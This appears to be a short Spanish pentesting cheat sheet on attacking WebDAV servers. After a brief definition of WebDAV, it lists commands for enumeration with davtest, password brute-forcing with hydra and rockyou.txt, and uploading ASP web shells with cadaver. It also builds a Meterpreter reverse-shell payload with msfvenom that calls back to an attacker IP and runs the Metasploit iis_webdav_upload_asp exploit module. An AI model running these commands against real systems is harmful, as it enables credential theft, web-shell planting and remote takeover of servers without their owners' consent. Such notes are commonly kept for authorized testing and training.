Webdav

rcWebDAV (Web Distributed Authoring and Versioning) es una extensión del protocolo HTTP (Hypertext Transfer Protocol) que permite a los usuarios gestionar y editar archivos almacenados en servidores remotos. WebDAV fue diseñado para facilitar la colaboración entre usuarios en la creación y edición de contenidos en la web, permitiendo operaciones como la carga y descarga de archivos, la gestión de directorios, y la edición directa de archivos en un servidor.

Enumeracion webDAV

# Si se necesita proveer contraseña se mete el argumento -auth
davtest -url <URL/webdav> -auth user:pass

Fuerza bruta contra webdav login panel

hydra -L usuarios.txt -P rockyou.txt <IP> http-get /webdav/

Web-shell con cadaver

cadaver <URL/webdav>
put /usr/share/webshells/asp
# con la enumeracion de cadaver se ve el tipo de ficheros que se pueden subir y cuales se pueden ejecutar

Reverse shell en asp con Metasploit

Opcion 1

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip_atacante> LPORT=<puerto_atacante> -f asp > shell.asp
cadaver <URL/webdav>
put ./shell.asp


use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST y set LPORT

Visitar el shell.asp desde la web

Opcion 2

use exploit/windows/iis/iis_webdav_upload_asp
set payload windows/meterpreter/reverse_tcp
exploit (en lugar de run)